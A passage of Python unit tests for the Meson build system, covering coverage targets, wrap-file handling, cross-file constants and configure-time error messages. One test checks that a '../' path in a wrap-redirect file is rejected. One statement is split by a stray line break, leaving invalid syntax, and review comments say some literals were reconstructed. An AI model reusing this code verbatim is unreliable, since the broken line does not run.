        self.assertIn('I am Python3.', out)

        # `--$BACKEND-args`
        testdir = os.path.join(self.common_test_dir, '1 trivial')
        if self.backend is Backend.ninja:
            self.init(testdir, extra_args=['--wipe'])
            # Dry run - should not create a program
            self._run([*self.meson_command, 'compile', '-C', self.builddir, '--ninja-args=-n'])
            self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
        elif self.backend is Backend.vs:
            self.init(testdir, extra_args=['--wipe'])
            self._run([*self.meson_command, 'compile', '-C', self.builddir])
            # Explicitly clean the target through msbuild interface
            self._run([*self.meson_command, 'compile', '-C', self.builddir, '--vs-args=-t:{}:Clean'.format(re.sub(r'[\%\$\@\;\.\(\)\']', '_', get_exe_name('trivialprog')))])
            self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))

    def test_spurious_reconfigure_built_dep_file(self):
        testdir = os.path.join(self.unit_test_dir, '75 dep files')

        # Regression test: Spurious reconfigure was happening when build
        # directory is inside source directory.
        # See https://gitlab.freedesktop.org/gstreamer/gst-build/-/issues/85.
        srcdir = os.path.join(self.builddir, 'srctree')
        shutil.copytree(testdir, srcdir)

        builddir = os.path.join(srcdir, '_build')
        self.change_builddir(builddir)

        self.init(srcdir)
        self.build()

        # During first configure the file did not exist so no dependency should
        # have been set. A rebuild should not trigger a reconfigure.
        self.clean()
        out = self.build()
        self.assertNotIn('Project configured', out)

        self.init(srcdir, extra_args=['--reconfigure'])

        # During the reconfigure the file did exist, but is inside build
        # directory, so no dependency should have been set. A rebuild should not
        # trigger a reconfigure.
        self.clean()
        out = self.build()
        self.assertNotIn('Project configured', out)

    def _test_junit(self, case: str) -> None:
        '''
        Configure and run the tests of @case, then validate the generated
        testlog.junit.xml against the bundled JUnit XML schema.
        '''
        try:
            import lxml.etree as et
        except ImportError:
            raise unittest.SkipTest('lxml required, but not found.')

        schema = et.XMLSchema(et.parse(str(Path(__file__).parent / 'data' / 'schema.xsd')))

        self.init(case)
        self.run_tests()

        junit = et.parse(str(Path(self.builddir) / 'meson-logs' / 'testlog.junit.xml'))
        try:
            schema.assertValid(junit)
        except et.DocumentInvalid as e:
            self.fail(e.error_log)

    def test_junit_valid_tap(self):
        self._test_junit(os.path.join(self.common_test_dir, '207 tap tests'))

    def test_junit_valid_exitcode(self):
        self._test_junit(os.path.join(self.common_test_dir, '42 test args'))

    def test_junit_valid_gtest(self):
        self._test_junit(os.path.join(self.framework_test_dir, '2 gtest'))

    def test_link_language_linker(self):
        # TODO: there should be some way to query how we're linking things
        # without resorting to reading the ninja.build file
        if self.backend is not Backend.ninja:
            raise unittest.SkipTest('This test reads the ninja file')

        testdir = os.path.join(self.common_test_dir, '226 link language')
        self.init(testdir)

        build_ninja = os.path.join(self.builddir, 'build.ninja')
        with open(build_ninja, 'r', encoding='utf-8') as f:
            contents = f.read()

        # Both targets must be linked with the C linker (link_language: 'c').
        self.assertRegex(contents, r'build main(\.exe)?.*: c_LINKER')
        self.assertRegex(contents, r'build (lib|cyg)?mylib.*: c_LINKER')

    def test_commands_documented(self):
        '''
        Test that all listed meson commands are documented in Commands.md.
        '''

        # The docs directory is not in release tarballs.
        if not os.path.isdir('docs'):
            raise unittest.SkipTest('Doc directory does not exist.')
        doc_path = 'docs/markdown/Commands.md'

        md = None
        with open(doc_path, encoding='utf-8') as f:
            md = f.read()
        self.assertIsNotNone(md)

        ## Get command sections

        section_pattern = re.compile(r'^### (.+)$', re.MULTILINE)
        md_command_section_matches = [i for i in section_pattern.finditer(md)]
        md_command_sections = dict()
        for i, s in enumerate(md_command_section_matches):
            # A section runs to the start of the next section (or EOF).
            section_end = len(md) if i == len(md_command_section_matches) - 1 else md_command_section_matches[i + 1].start()
            md_command_sections[s.group(1)] = (s.start(), section_end)

        ## Validate commands

        # NOTE(review): equivalent to set(md_command_sections); kept verbatim.
        md_commands = set(k for k,v in md_command_sections.items())

        help_output = self._run(self.meson_command + ['--help'])
        # Extract the {cmd1,cmd2,...} choices list from argparse's usage line.
        help_commands = set(c.strip() for c in re.findall(r'usage:(?:.+)?{((?:[a-z]+,*)+?)}', help_output, re.MULTILINE|re.DOTALL)[0].split(','))

        self.assertEqual(md_commands | {'help'}, help_commands, 'Doc file: `{}`'.format(doc_path))

        ## Validate that each section has proper placeholders

        def get_data_pattern(command):
            return re.compile(
                r'{{ ' + command + r'_usage.inc }}[\r\n]'
                r'.*?'
                r'{{ ' + command + r'_arguments.inc }}[\r\n]',
                flags = re.MULTILINE|re.DOTALL)

        for command in md_commands:
            m = get_data_pattern(command).search(md, pos=md_command_sections[command][0], endpos=md_command_sections[command][1])
            self.assertIsNotNone(m, 'Command `{}` is missing placeholders for dynamic data. Doc file: `{}`'.format(command, doc_path))

    def _check_coverage_files(self, types=('text', 'xml', 'html')):
        '''Assert that the coverage outputs listed in @types were produced.'''
        covdir = Path(self.builddir) / 'meson-logs'
        files = []
        if 'text' in types:
            files.append('coverage.txt')
        if 'xml' in types:
            files.append('coverage.xml')
        if 'html' in types:
            files.append('coveragereport/index.html')
        for f in files:
            self.assertTrue((covdir / f).is_file(), msg='{} is not a file'.format(f))

    def test_coverage(self):
        if mesonbuild.environment.detect_msys2_arch():
            raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
        gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
        if not gcovr_exe:
            raise unittest.SkipTest('gcovr not found, or too old')
        testdir = os.path.join(self.common_test_dir, '1 trivial')
        env = get_fake_env(testdir, self.builddir, self.prefix)
        cc = env.detect_c_compiler(MachineChoice.HOST)
        if cc.get_id() == 'clang':
            if not mesonbuild.environment.detect_llvm_cov():
                raise unittest.SkipTest('llvm-cov not found')
        if cc.get_id() == 'msvc':
            raise unittest.SkipTest('Test only applies to non-MSVC compilers')
        self.init(testdir, extra_args=['-Db_coverage=true'])
        self.build()
        self.run_tests()
        self.run_target('coverage')
        self._check_coverage_files()

    def test_coverage_complex(self):
        if mesonbuild.environment.detect_msys2_arch():
            raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
        gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
        if not gcovr_exe:
            raise unittest.SkipTest('gcovr not found, or too old')
        testdir = os.path.join(self.common_test_dir, '106 generatorcustom')
        env = get_fake_env(testdir, self.builddir, self.prefix)
        cc = env.detect_c_compiler(MachineChoice.HOST)
        if cc.get_id() == 'clang':
            if not mesonbuild.environment.detect_llvm_cov():
                raise unittest.SkipTest('llvm-cov not found')
        if cc.get_id() == 'msvc':
            raise unittest.SkipTest('Test only applies to non-MSVC compilers')
        self.init(testdir, extra_args=['-Db_coverage=true'])
        self.build()
        self.run_tests()
        self.run_target('coverage')
        self._check_coverage_files()

    def test_coverage_html(self):
        if mesonbuild.environment.detect_msys2_arch():
            raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
        gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
        if not gcovr_exe:
            raise unittest.SkipTest('gcovr not found, or too old')
        testdir = os.path.join(self.common_test_dir, '1 trivial')
        env = get_fake_env(testdir, self.builddir, self.prefix)
        cc = env.detect_c_compiler(MachineChoice.HOST)
        if cc.get_id() == 'clang':
            if not mesonbuild.environment.detect_llvm_cov():
                raise unittest.SkipTest('llvm-cov not found')
        if cc.get_id() == 'msvc':
            raise unittest.SkipTest('Test only applies to non-MSVC compilers')
        self.init(testdir, extra_args=['-Db_coverage=true'])
        self.build()
        self.run_tests()
        self.run_target('coverage-html')
        self._check_coverage_files(['html'])

    def test_coverage_text(self):
        if mesonbuild.environment.detect_msys2_arch():
            raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
        gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
        if not gcovr_exe:
            raise unittest.SkipTest('gcovr not found, or too old')
        testdir = os.path.join(self.common_test_dir, '1 trivial')
        env = get_fake_env(testdir, self.builddir, self.prefix)
        cc = env.detect_c_compiler(MachineChoice.HOST)
        if cc.get_id() == 'clang':
            if not mesonbuild.environment.detect_llvm_cov():
                raise unittest.SkipTest('llvm-cov not found')
        if cc.get_id() == 'msvc':
            raise unittest.SkipTest('Test only applies to non-MSVC compilers')
        self.init(testdir, extra_args=['-Db_coverage=true'])
        self.build()
        self.run_tests()
        self.run_target('coverage-text')
        self._check_coverage_files(['text'])

    def test_coverage_xml(self):
        if mesonbuild.environment.detect_msys2_arch():
            raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
        gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
        if not gcovr_exe:
            raise unittest.SkipTest('gcovr not found, or too old')
        testdir = os.path.join(self.common_test_dir, '1 trivial')
        env = get_fake_env(testdir, self.builddir, self.prefix)
        cc = env.detect_c_compiler(MachineChoice.HOST)
        if cc.get_id() == 'clang':
            if not mesonbuild.environment.detect_llvm_cov():
                raise unittest.SkipTest('llvm-cov not found')
        if cc.get_id() == 'msvc':
            raise unittest.SkipTest('Test only applies to non-MSVC compilers')
        self.init(testdir, extra_args=['-Db_coverage=true'])
        self.build()
        self.run_tests()
        self.run_target('coverage-xml')
        self._check_coverage_files(['xml'])

    def test_cross_file_constants(self):
        '''
        [constants] sections must be shared across multiple machine files and
        be usable from [properties] and [binaries], including the / path-join
        operator and list concatenation.
        NOTE(review): the dedent literals below were reconstructed from a
        whitespace-corrupted source; line structure is what the INI parser
        needs, but confirm against upstream.
        '''
        with temp_filename() as crossfile1, temp_filename() as crossfile2:
            with open(crossfile1, 'w') as f:
                f.write(textwrap.dedent(
                    '''
                    [constants]
                    compiler = 'gcc'
                    '''))
            with open(crossfile2, 'w') as f:
                f.write(textwrap.dedent(
                    '''
                    [constants]
                    toolchain = '/toolchain/'
                    common_flags = ['--sysroot=' + toolchain / 'sysroot']

                    [properties]
                    c_args = common_flags + ['-DSOMETHING']
                    cpp_args = c_args + ['-DSOMETHING_ELSE']

                    [binaries]
                    c = toolchain / compiler
                    '''))

            values = mesonbuild.coredata.parse_machine_files([crossfile1, crossfile2])
            self.assertEqual(values['binaries']['c'], '/toolchain/gcc')
            self.assertEqual(values['properties']['c_args'],
                             ['--sysroot=/toolchain/sysroot', '-DSOMETHING'])
            self.assertEqual(values['properties']['cpp_args'],
                             ['--sysroot=/toolchain/sysroot', '-DSOMETHING', '-DSOMETHING_ELSE'])

    @unittest.skipIf(is_windows(), 'Directory cleanup fails for some reason')
    def test_wrap_git(self):
        '''A [wrap-git] subproject with a patch_directory must configure, build and pass its tests.'''
        with tempfile.TemporaryDirectory() as tmpdir:
            srcdir = os.path.join(tmpdir, 'src')
            shutil.copytree(os.path.join(self.unit_test_dir, '82 wrap-git'), srcdir)
            upstream = os.path.join(srcdir, 'subprojects', 'wrap_git_upstream')
            upstream_uri = Path(upstream).as_uri()
            _git_init(upstream)
            with open(os.path.join(srcdir, 'subprojects', 'wrap_git.wrap'), 'w') as f:
                f.write(textwrap.dedent('''
                    [wrap-git]
                    url = {}
                    patch_directory = wrap_git_builddef
                    revision = master
                    '''.format(upstream_uri)))
            self.init(srcdir)
            self.build()
            self.run_tests()

    def test_multi_output_custom_target_no_warning(self):
        '''A multi-output custom_target used as a source must not warn about "Using the first one".'''
        testdir = os.path.join(self.common_test_dir, '229 custom_target source')

        out = self.init(testdir)
        self.assertNotRegex(out, 'WARNING:.*Using the first one.')
        self.build()
        self.run_tests()

    @unittest.skipUnless(is_linux() and (re.search('^i.86$|^x86$|^x64$|^x86_64$|^amd64$', platform.processor()) is not None),
                         'Requires ASM compiler for x86 or x86_64 platform currently only available on Linux CI runners')
    def test_nostdlib(self):
        '''A custom c_stdlib must work both as a native-file and as a cross-file property.'''
        testdir = os.path.join(self.unit_test_dir, '79 nostdlib')
        machinefile = os.path.join(self.builddir, 'machine.txt')
        with open(machinefile, 'w') as f:
            f.write(textwrap.dedent('''
                [properties]
                c_stdlib = 'mylibc'
                '''))

        # Test native C stdlib
        self.meson_native_file = machinefile
        self.init(testdir)
        self.build()

        # Test cross C stdlib
        self.new_builddir()
        self.meson_native_file = None
        self.meson_cross_file = machinefile
        self.init(testdir)
        self.build()

    def test_meson_version_compare(self):
        '''meson.version().version_compare() use must not emit warnings.'''
        testdir = os.path.join(self.unit_test_dir, '83 meson version compare')
        out = self.init(testdir)
        self.assertNotRegex(out, r'WARNING')

    def test_wrap_redirect(self):
        '''[wrap-redirect] filename validation: extension, no "..", and the foo/subprojects/bar.wrap shape.'''
        redirect_wrap = os.path.join(self.builddir, 'redirect.wrap')
        real_wrap = os.path.join(self.builddir, 'foo/subprojects/real.wrap')
        os.makedirs(os.path.dirname(real_wrap))

        # Invalid redirect, filename must have .wrap extension
        with open(redirect_wrap, 'w') as f:
            f.write(textwrap.dedent('''
                [wrap-redirect]
                filename = foo/subprojects/real.wrapper
                '''))
        with self.assertRaisesRegex(WrapException, 'wrap-redirect filename must be a .wrap file'):
            PackageDefinition(redirect_wrap)

        # Invalid redirect, filename cannot be in parent directory
        with open(redirect_wrap, 'w') as f:
            f.write(textwrap.dedent('''
                [wrap-redirect]
                filename = ../real.wrap
                '''))
        with self.assertRaisesRegex(WrapException, 'wrap-redirect filename cannot contain ".."'):
            PackageDefinition(redirect_wrap)

        # Invalid redirect, filename must be in foo/subprojects/real.wrap
        with
 open(redirect_wrap, 'w') as f:
            f.write(textwrap.dedent('''
                [wrap-redirect]
                filename = foo/real.wrap
                '''))
        with self.assertRaisesRegex(WrapException, 'wrap-redirect filename must be in the form foo/subprojects/bar.wrap'):
            wrap = PackageDefinition(redirect_wrap)

        # Correct redirect
        with open(redirect_wrap, 'w') as f:
            f.write(textwrap.dedent('''
                [wrap-redirect]
                filename = foo/subprojects/real.wrap
                '''))
        with open(real_wrap, 'w') as f:
            f.write(textwrap.dedent('''
                [wrap-git]
                url = http://invalid
                '''))
        wrap = PackageDefinition(redirect_wrap)
        self.assertEqual(wrap.get('url'), 'http://invalid')

    @skip_if_no_cmake
    def test_nested_cmake_rebuild(self) -> None:
        # This checks a bug where if a non-meson project is used as a third
        # level (or deeper) subproject it doesn't cause a rebuild if the build
        # files for that project are changed
        testdir = os.path.join(self.unit_test_dir, '86 nested subproject regenerate depends')
        cmakefile = Path(testdir) / 'subprojects' / 'sub2' / 'CMakeLists.txt'
        self.init(testdir)
        self.build()
        # Touch the CMakeLists.txt (open('a') guarantees it exists before utime).
        with cmakefile.open('a') as f:
            os.utime(str(cmakefile))
        self.assertReconfiguredBuildIsNoop()


class FailureTests(BasePlatformTests):
    '''
    Tests that test failure conditions. Build files here should be dynamically
    generated and static tests should go into `test cases/failing*`.
    This is useful because there can be many ways in which a particular
    function can fail, and creating failing tests for all of them is tedious
    and slows down testing.
    '''
    # Regex matching meson's "dependency not found" error output.
    dnf = "[Dd]ependency.*not found(:.*)?"
    # Regex matching meson's "pkg-config not found" error output.
    nopkg = '[Pp]kg-config.*not found'

    def setUp(self):
        super().setUp()
        # Each test gets a scratch source dir with its own meson.build /
        # meson_options.txt that the assert helpers below write into.
        self.srcdir = os.path.realpath(tempfile.mkdtemp())
        self.mbuild = os.path.join(self.srcdir, 'meson.build')
        self.moptions = os.path.join(self.srcdir, 'meson_options.txt')

    def tearDown(self):
        super().tearDown()
        windows_proof_rmtree(self.srcdir)

    def assertMesonRaises(self, contents, match, *,
                          extra_args=None,
                          langs=None,
                          meson_version=None,
                          options=None,
                          override_envvars=None):
        '''
        Assert that running meson configure on the specified @contents raises
        a error message matching regex @match.
        '''
        if langs is None:
            langs = []
        with open(self.mbuild, 'w') as f:
            f.write("project('failure test', 'c', 'cpp'")
            if meson_version:
                f.write(", meson_version: '{}'".format(meson_version))
            f.write(")\n")
            for lang in langs:
                f.write("add_languages('{}', required : false)\n".format(lang))
            f.write(contents)
        if options is not None:
            with open(self.moptions, 'w') as f:
                f.write(options)
        o = {'MESON_FORCE_BACKTRACE': '1'}
        if override_envvars is None:
            override_envvars = o
        else:
            # NOTE(review): this mutates the caller's dict in place; callers in
            # this file pass throwaway literals so it is harmless here, but a
            # copy ({**override_envvars, **o}) would be safer.
            override_envvars.update(o)
        # Force tracebacks so we can detect them properly
        with self.assertRaisesRegex(MesonException, match, msg=contents):
            # Must run in-process or we'll get a generic CalledProcessError
            self.init(self.srcdir, extra_args=extra_args,
                      inprocess=True,
                      override_envvars = override_envvars)

    def obtainMesonOutput(self, contents, match, extra_args, langs, meson_version=None):
        '''Write @contents into a generated project and return configure output.'''
        if langs is None:
            langs = []
        with open(self.mbuild, 'w') as f:
            f.write("project('output test', 'c', 'cpp'")
            if meson_version:
                f.write(", meson_version: '{}'".format(meson_version))
            f.write(")\n")
            for lang in langs:
                f.write("add_languages('{}', required : false)\n".format(lang))
            f.write(contents)
        # Run in-process for speed and consistency with assertMesonRaises
        return self.init(self.srcdir, extra_args=extra_args, inprocess=True)

    def assertMesonOutputs(self, contents, match, extra_args=None, langs=None, meson_version=None):
        '''
        Assert that running meson configure on the specified @contents outputs
        something that matches regex @match.
        '''
        out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
        self.assertRegex(out, match)

    def assertMesonDoesNotOutput(self, contents, match, extra_args=None, langs=None, meson_version=None):
        '''
        Assert that running meson configure on the specified @contents does not output
        something that matches regex @match.
        '''
        out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
        self.assertNotRegex(out, match)

    @skipIfNoPkgconfig
    def test_dependency(self):
        '''Invalid dependency() keyword arguments must produce targeted errors.'''
        if subprocess.call(['pkg-config', '--exists', 'zlib']) != 0:
            raise unittest.SkipTest('zlib not found with pkg-config')
        a = (("dependency('zlib', method : 'fail')", "'fail' is invalid"),
             ("dependency('zlib', static : '1')", "[Ss]tatic.*boolean"),
             ("dependency('zlib', version : 1)", "Item must be a list or one of <class 'str'>"),
             ("dependency('zlib', required : 1)", "[Rr]equired.*boolean"),
             ("dependency('zlib', method : 1)", "[Mm]ethod.*string"),
             ("dependency('zlibfail')", self.dnf),)
        for contents, match in a:
            self.assertMesonRaises(contents, match)

    def test_apple_frameworks_dependency(self):
        if not is_osx():
            raise unittest.SkipTest('only run on macOS')
        self.assertMesonRaises("dependency('appleframeworks')",
                               "requires at least one module")

    def test_extraframework_dependency_method(self):
        code = "dependency('python', method : 'extraframework')"
        if not is_osx():
            self.assertMesonRaises(code, self.dnf)
        else:
            # Python2 framework is always available on macOS
            self.assertMesonOutputs(code, '[Dd]ependency.*python.*found.*YES')

    def test_sdl2_notfound_dependency(self):
        # Want to test failure, so skip if available
        if shutil.which('sdl2-config'):
            raise unittest.SkipTest('sdl2-config found')
        self.assertMesonRaises("dependency('sdl2', method : 'sdlconfig')", self.dnf)
        if shutil.which('pkg-config'):
            self.assertMesonRaises("dependency('sdl2', method : 'pkg-config')", self.dnf)
        with no_pkgconfig():
            # Look for pkg-config, cache it, then
            # Use cached pkg-config without erroring out, then
            # Use cached pkg-config to error out
            code = "dependency('foobarrr', method : 'pkg-config', required : false)\n" \
                   "dependency('foobarrr2', method : 'pkg-config', required : false)\n" \
                   "dependency('sdl2', method : 'pkg-config')"
            self.assertMesonRaises(code, self.nopkg)

    def test_gnustep_notfound_dependency(self):
        # Want to test failure, so skip if available
        if shutil.which('gnustep-config'):
            raise unittest.SkipTest('gnustep-config found')
        self.assertMesonRaises("dependency('gnustep')",
                               "(requires a Objc compiler|{})".format(self.dnf),
                               langs = ['objc'])

    def test_wx_notfound_dependency(self):
        # Want to test failure, so skip if available
        if shutil.which('wx-config-3.0') or shutil.which('wx-config') or shutil.which('wx-config-gtk3'):
            raise unittest.SkipTest('wx-config, wx-config-3.0 or wx-config-gtk3 found')
        self.assertMesonRaises("dependency('wxwidgets')", self.dnf)
        self.assertMesonOutputs("dependency('wxwidgets', required : false)",
                                "Run-time dependency .*WxWidgets.* found: .*NO.*")

    def test_wx_dependency(self):
        if not shutil.which('wx-config-3.0') and not shutil.which('wx-config') and not shutil.which('wx-config-gtk3'):
            raise unittest.SkipTest('Neither wx-config, wx-config-3.0 nor wx-config-gtk3 found')
        self.assertMesonRaises("dependency('wxwidgets', modules : 1)",
                               "module argument is not a string")

    def test_llvm_dependency(self):
        self.assertMesonRaises("dependency('llvm', modules : 'fail')",
                               "(required.*fail|{})".format(self.dnf))

    def test_boost_notfound_dependency(self):
        # Can be run even if Boost is found or not
        self.assertMesonRaises("dependency('boost', modules : 1)",
                               "module.*not a string")
        self.assertMesonRaises("dependency('boost', modules : 'fail')",
                               "(fail.*not found|{})".format(self.dnf))

    def test_boost_BOOST_ROOT_dependency(self):
        # Test BOOST_ROOT; can be run even if Boost is found or not
        self.assertMesonRaises("dependency('boost')",
                               "(boost_root.*absolute|{})".format(self.dnf),
                               override_envvars =
{'BOOST_ROOT': 'relative/path'})

    def test_dependency_invalid_method(self):
        # Calling a config-tool method on a non-config-tool dependency, or
        # pkg-config/config-tool methods on an internal (declared) dependency,
        # must produce a clear error.
        code = '''zlib_dep = dependency('zlib', required : false)
        zlib_dep.get_configtool_variable('foo')
        '''
        self.assertMesonRaises(code, ".* is not a config-tool dependency")
        code = '''zlib_dep = dependency('zlib', required : false)
        dep = declare_dependency(dependencies : zlib_dep)
        dep.get_pkgconfig_variable('foo')
        '''
        self.assertMesonRaises(code, "Method.*pkgconfig.*is invalid.*internal")
        code = '''zlib_dep = dependency('zlib', required : false)
        dep = declare_dependency(dependencies : zlib_dep)
        dep.get_configtool_variable('foo')
        '''
        self.assertMesonRaises(code, "Method.*configtool.*is invalid.*internal")

    def test_objc_cpp_detection(self):
        '''
        Test that when we can't detect objc or objcpp, we fail gracefully.
        '''
        env = get_fake_env()
        try:
            env.detect_objc_compiler(MachineChoice.HOST)
            env.detect_objcpp_compiler(MachineChoice.HOST)
        except EnvironmentException:
            # Detection failed on this machine, which is exactly the case we
            # want to exercise: add_languages() must raise, not crash.
            code = "add_languages('objc')\nadd_languages('objcpp')"
            self.assertMesonRaises(code, "Unknown compiler")
            return
        raise unittest.SkipTest("objc and objcpp found, can't test detection failure")

    def test_subproject_variables(self):
        '''
        Test that:
        1. The correct message is outputted when a not-required dep is not
           found and the fallback subproject is also not found.
        2. A not-required fallback dependency is not found because the
           subproject failed to parse.
        3. A not-found not-required dep with a fallback subproject outputs the
           correct message when the fallback subproject is found but the
           variable inside it is not.
        4. A fallback dependency is found from the subproject parsed in (3)
        5. A wrap file from a subproject is used but fails because it does not
           contain required keys.
        '''
        tdir = os.path.join(self.unit_test_dir, '20 subproj dep variables')
        # inprocess=True so the configure log is captured in `out` for the
        # regex assertions below.
        out = self.init(tdir, inprocess=True)
        self.assertRegex(out, r"Neither a subproject directory nor a .*nosubproj.wrap.* file was found")
        self.assertRegex(out, r'Function does not take positional arguments.')
        self.assertRegex(out, r'Dependency .*somenotfounddep.* from subproject .*subprojects/somesubproj.* found: .*NO.*')
        self.assertRegex(out, r'Dependency .*zlibproxy.* from subproject .*subprojects.*somesubproj.* found: .*YES.*')
        self.assertRegex(out, r'Missing key .*source_filename.* in subsubproject.wrap')

    def test_exception_exit_status(self):
        '''
        Test exit status on python exception
        '''
        tdir = os.path.join(self.unit_test_dir, '21 exit status')
        # Must run out-of-process so the interpreter's exit code is observable.
        with self.assertRaises(subprocess.CalledProcessError) as cm:
            self.init(tdir, inprocess=False, override_envvars = {'MESON_UNIT_TEST': '1'})
        self.assertEqual(cm.exception.returncode, 2)
        self.wipe()

    def test_dict_requires_key_value_pairs(self):
        # Bare elements mixed into a dict literal are rejected.
        self.assertMesonRaises("dict = {3, 'foo': 'bar'}",
                               'Only key:value pairs are valid in dict construction.')
        self.assertMesonRaises("{'foo': 'bar', 3}",
                               'Only key:value pairs are valid in dict construction.')

    def test_dict_forbids_duplicate_keys(self):
        self.assertMesonRaises("dict = {'a': 41, 'a': 42}",
                               'Duplicate dictionary key: a.*')

    def test_dict_forbids_integer_key(self):
        self.assertMesonRaises("dict = {3: 'foo'}",
                               'Key must be a string.*')

    def test_using_too_recent_feature(self):
        # Here we use a dict, which was introduced in 0.47.0
        self.assertMesonOutputs("dict = {}",
                                ".*WARNING.*Project targeting.*but.*",
                                meson_version='>= 0.46.0')

    def test_using_recent_feature(self):
        # Same as above, except the meson version is now appropriate
        self.assertMesonDoesNotOutput("dict = {}",
                                      ".*WARNING.*Project targeting.*but.*",
                                      meson_version='>= 0.47')

    def test_using_too_recent_feature_dependency(self):
        self.assertMesonOutputs("dependency('pcap', required: false)",
                                ".*WARNING.*Project targeting.*but.*",
                                meson_version='>= 0.41.0')

    def test_vcs_tag_featurenew_build_always_stale(self):
        'https://github.com/mesonbuild/meson/issues/3904'
        vcs_tag = '''version_data = configuration_data()
        version_data.set('PROJVER', '@VCS_TAG@')
        vf = configure_file(output : 'version.h.in', configuration: version_data)
        f = vcs_tag(input : vf, output : 'version.h')
        '''
        # vcs_tag() uses build_always_stale internally; that must not trigger
        # a FeatureNew warning on the user's behalf.
        msg = '.*WARNING:.*feature.*build_always_stale.*custom_target.*'
        self.assertMesonDoesNotOutput(vcs_tag, msg, meson_version='>=0.43')

    def test_missing_subproject_not_required_and_required(self):
        self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
                               "sub2 = subproject('not-found-subproject', required: true)",
                               """.*Subproject "subprojects/not-found-subproject" required but not found.*""")

    def test_get_variable_on_not_found_project(self):
        self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
                               "sub1.get_variable('naaa')",
                               """Subproject "subprojects/not-found-subproject" disabled can't get_variable on it.""")

    def test_version_checked_before_parsing_options(self):
        '''
        https://github.com/mesonbuild/meson/issues/5281
        '''
        # The invalid option type must never be reached because the version
        # mismatch is reported first.
        options = "option('some-option', type: 'foo', value: '')"
        match = 'Meson version is.*but project requires >=2000'
        self.assertMesonRaises("", match, meson_version='>=2000', options=options)

    def test_assert_default_message(self):
        # With no message argument, assert() prints the stringified expression.
        self.assertMesonRaises("k1 = 'a'\n" +
                               "assert({\n" +
                               "  k1: 1,\n" +
                               "}['a'] == 2)\n",
                               r"Assert failed: {k1 : 1}\['a'\] == 2")

    def test_wrap_nofallback(self):
        self.assertMesonRaises("dependency('notfound', fallback : ['foo', 'foo_dep'])",
                               r"Dependency \'notfound\' not found and fallback is disabled",
                               extra_args=['--wrap-mode=nofallback'])

    def test_message(self):
        self.assertMesonOutputs("message('Array:', ['a', 'b'])",
                                r"Message:.* Array: \['a', 'b'\]")

    def test_warning(self):
        self.assertMesonOutputs("warning('Array:', ['a', 'b'])",
                                r"WARNING:.* Array: \['a', 'b'\]")

    def test_override_dependency_twice(self):
        self.assertMesonRaises("meson.override_dependency('foo', declare_dependency())\n" +
                               "meson.override_dependency('foo', declare_dependency())",
                               """Tried to override dependency 'foo' which has already been resolved or overridden""")

    @unittest.skipIf(is_windows(), 'zlib is not available on Windows')
    def test_override_resolved_dependency(self):
        # Overriding after the dependency has already been looked up is an error.
        self.assertMesonRaises("dependency('zlib')\n" +
                               "meson.override_dependency('zlib', declare_dependency())",
                               """Tried to override dependency 'zlib' which has already been resolved or overridden""")


@unittest.skipUnless(is_windows() or is_cygwin(), "requires Windows (or Windows via Cygwin)")
class WindowsTests(BasePlatformTests):
    '''
    Tests that should run on Cygwin, MinGW, and MSVC
    '''

    def setUp(self):
        super().setUp()
        self.platform_test_dir = os.path.join(self.src_root, 'test cases/windows')

    @unittest.skipIf(is_cygwin(), 'Test only applicable to Windows')
    @mock.patch.dict(os.environ)
    def test_find_program(self):
        '''
        Test that Windows-specific edge-cases in find_program are functioning
        correctly. Cannot be an ordinary test because it involves manipulating
        PATH to point to a directory with Python scripts.
        '''
        testdir = os.path.join(self.platform_test_dir, '8 find program')
        # Find `cmd` and `cmd.exe`
        prog1 = ExternalProgram('cmd')
        self.assertTrue(prog1.found(), msg='cmd not found')
        prog2 = ExternalProgram('cmd.exe')
        self.assertTrue(prog2.found(), msg='cmd.exe not found')
        self.assertPathEqual(prog1.get_path(), prog2.get_path())
        # Find cmd.exe with args without searching
        prog = ExternalProgram('cmd', command=['cmd', '/C'])
        self.assertTrue(prog.found(), msg='cmd not found with args')
        self.assertPathEqual(prog.get_command()[0], 'cmd')
        # Find cmd with an absolute path that's missing the extension
        cmd_path = prog2.get_path()[:-4]
        prog = ExternalProgram(cmd_path)
        self.assertTrue(prog.found(), msg='{!r} not found'.format(cmd_path))
        # Finding a script with no extension inside a directory works
        prog = ExternalProgram(os.path.join(testdir, 'test-script'))
        self.assertTrue(prog.found(), msg='test-script not found')
        # Finding a script with an extension inside a directory works
        prog = ExternalProgram(os.path.join(testdir, 'test-script-ext.py'))
        self.assertTrue(prog.found(), msg='test-script-ext.py not found')
        # Finding a script in PATH
        os.environ['PATH'] += os.pathsep + testdir
        # If `.PY` is in PATHEXT, scripts can be found as programs
        if '.PY' in [ext.upper() for ext in os.environ['PATHEXT'].split(';')]:
            # Finding a script in PATH w/o extension works and adds the interpreter
            prog = ExternalProgram('test-script-ext')
            self.assertTrue(prog.found(), msg='test-script-ext not found in PATH')
            self.assertPathEqual(prog.get_command()[0], python_command[0])
            self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
        # Finding a script in PATH with extension works and adds the interpreter
        prog = ExternalProgram('test-script-ext.py')
        self.assertTrue(prog.found(), msg='test-script-ext.py not found in PATH')
        self.assertPathEqual(prog.get_command()[0], python_command[0])
        self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
        # Using a script with an extension directly via command= works and adds the interpreter
        prog = ExternalProgram('test-script-ext.py', command=[os.path.join(testdir, 'test-script-ext.py'), '--help'])
        self.assertTrue(prog.found(), msg='test-script-ext.py with full path not picked up via command=')
        self.assertPathEqual(prog.get_command()[0], python_command[0])
        self.assertPathEqual(prog.get_command()[2], '--help')
